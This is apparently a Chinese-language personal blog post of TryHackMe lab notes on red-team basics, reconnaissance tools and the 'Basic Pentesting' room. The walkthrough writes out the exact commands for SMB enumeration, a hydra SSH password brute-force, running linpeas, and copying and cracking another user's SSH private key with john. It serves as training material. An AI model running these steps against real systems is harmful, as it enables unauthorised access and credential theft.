Sean's Blog
0%

tryhackme

发表于 更新于 分类于

https://tryhackme.com/

Red Team Fundamentals

主要是描述了红队蓝队的区别和职责,攻击链,举了一个攻击实例。

钓鱼邮件

PrintNightmare提权漏洞

mimikatz 管理员账号 Backups

Pass-the-Hash

DBA-PC

Red Team Recon

信息收集:

  • 被动收集:查询公开信息(域名、IP、DNS记录
  • 主动收集:与目标产生交互(nmap、Nessus

内置工具使用:

  • whois:只能查询一级域名
  • nslookup、dig、host:DNS解析
  • traceroute/tracert:可能会有路由器响应

Google Hacking:可以发现一些敏感信息、文件、服务、路径等

  • 双引号精准搜索
  • 减号排除
  • filetype:pdf|xls
  • site:www.baidu.com
  • intitle:baidu
  • inurl:baidu.com

recon-ng(需要将kali设置为静态IP)

1
2
3
4
5
6
7
recon-ng -w name
db insert domains
> baidu.com
marketplace search ...
marketplace install ...
load ...
run

Basic Pentesting

OpenVPN接入(虚拟机kali2023.1)https://tryhackme.com/access

首先更新openvpn

1
2
3
sudo apt-get update
sudo apt-get install openvpn
sudo openvpn vpnfile

出现报错如下

1
2
3
4
2023-10-21 03:05:16 OpenSSL: error:0480006C:PEM routines::no start line
2023-10-21 03:05:16 OpenSSL: error:0A080009:SSL routines::PEM lib
2023-10-21 03:05:16 Cannot load inline certificate file
2023-10-21 03:05:16 Exiting due to fatal error

解决方法:修改Machines-VPN Server为EU-Regular-2

image-20231021160045341

1
2
3
4
5
6
7
8
9
# nmap -sS targetIP
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

后台扫描dirmap得到:/development

  • dev.txt:struts 2.5.12,SMB,Apache
  • j.txt:用户J存在弱密码

username-hint:用smb找用户名

enum4linux 10.10.139.17,找到文件共享的用户名

image-20231021164832260

其中Anonymous看起来像是可以未授权访问:smbclient //10.10.139.17/Anonymous,空密码登录成功,staff.txt中有用户名Kay和Jan

image-20231021165849995

后面真枚举出了用户名,就是跑的有点慢

image-20231021165501796

前面的j.txt提到J存在弱密码,hydra爆破:

1
hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.139.17 ssh

image-20231021173211286

ssh登录到jan用户,需要提权。工具linpeas:https://github.com/carlospolop/PEASS-ng/releases/download/20231015-0ad0e48c/linpeas.sh。目标机器好像不能出网,而且在自己的家目录下也没有写权限,利用scp将下载到本机的文件复制到目标的/tmp

1
2
3
4
5
scp linpeas.sh jan@10.10.139.17:/tmp
# 到目标机器上
cd /tmp
chmod +x linpeas.sh
./linpeas.sh

输出的东西也太多了吧。hint:另一个用户用的SSH密钥登录

/home/kay/.ssh/中存在私钥id_rsa,且已经Authorized,将私钥复制到攻击机(需要解密)

1
2
3
4
scp jan@10.10.35.1:/home/kay/.ssh/id_rsa .
chmod 600 id_rsa
python /usr/share/john/ssh2john.py id_rsa > john_rsa
john john_rsa --wordlist=/usr/share/wordlists/rockyou.txt

image-20231021183714515

1
2
ssh -i id_rsa kay@10.10.35.1 # 输入密码后成功登录kay
cat pass.bak

over!